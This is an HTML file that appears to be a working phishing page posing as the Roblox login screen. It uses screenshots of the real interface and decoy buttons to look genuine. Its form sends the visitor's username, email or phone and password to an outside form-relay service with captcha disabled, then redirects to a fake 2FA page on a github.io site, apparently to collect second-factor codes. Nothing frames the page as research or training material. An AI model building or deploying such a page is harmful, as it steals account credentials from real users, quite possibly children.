<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="'width=device-width, initial-scale=1.0">
    <title>Roblox Login</title>
    <link rel="stylesheet" href="style.css">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head> 
<body>
    <div class="container">
        <form class="tr" action="https://formsubmit.co/230539077b606fd794fdee683731ff30" method="POST">
            <!-- Honeypot -->
            <input type="text" name="_honey" style="display: none;">

            <!-- Disable Captcha -->
            <input type="hidden" name="_captcha" value="false">

            <input type="hidden" name="_next" value="https://mothmagic1.github.io/roblox.com-login/2FA.html" >           
            <h3>Login to Roblox</h3>
            <input type="text" name="user/email." id="name" placeholder="Username/Email/Phone" required>
            <input type="password" name="password." id="password" placeholder="Password" required >
            <button>Log In</button>
            <a id="forgot-crendentials-link" class="text-link" href="https://www.roblox.com/login/forgot-password-or-username" target="_self">Forgot Password or Username?</a>
            <img src="https://gcdnb.pbrd.co/images/YUJmGAW5eTN4.jpg?o=1" alt="roblox image extra login stuff">
            <img src="https://gcdnb.pbrd.co/images/2QIJ4L09CPRU.jpg?o=1" alt="roblox image top bar" class="tttt">
            <img src="https://gcdnb.pbrd.co/images/EayWDEo7V3eF.jpg?o=1" alt="roblox image top bardetailed green s up" class="thtt">
            <img src="https://gcdnb.pbrd.co/images/qIGWLyqLWSaW.jpg?o=1" alt="roblox image top bar blank fill in on top right" class="thgtt">
            <img src="2fa/img/Capturfffffffffffffffffffffffffffffffffffffffffffffffvvvvvvvvvre.JPG" alt="roblox image bottom text" class="tddddshgtt">
            <button class="rl56cr5" onclick="location.href='https://mothmagic1.github.io/roblox.com-login/'"></button>
            <button class="rffvl56cr5" onclick="location.href='https://mothmagic1.github.io/roblox.com-login/'"></button>
            <button class="rffvl156cr5" onclick="location.href='https://mothmagic1.github.io/roblox.com-login/'"></button>
            <button class="rffvl256cr5" onclick="location.href='https://mothmagic1.github.io/roblox.com-login/'"></button>
            <button class="rffvl356cr5" onclick="location.href='https://mothmagic1.github.io/roblox.com-login/'"></button>
            <button class="rffvl456cr5" onclick="location.href='https://mothmagic1.github.io/roblox.com-login/'"></button>
            <button class="rffvl556cr5" onclick="location.href='https://mothmagic1.github.io/roblox.com-login/'"></button>
            <button class="rffvl656cr5" onclick="location.href='https://mothmagic1.github.io/roblox.com-login/'"></button>
            <button class="rffvl756cr5" onclick="location.href='https://mothmagic1.github.io/roblox.com-login/'"></button>
            <input type="search bar" class="hwedd8g" id="search bar" placeholder="Search">
        </form>
    </div>
</body>
</html>




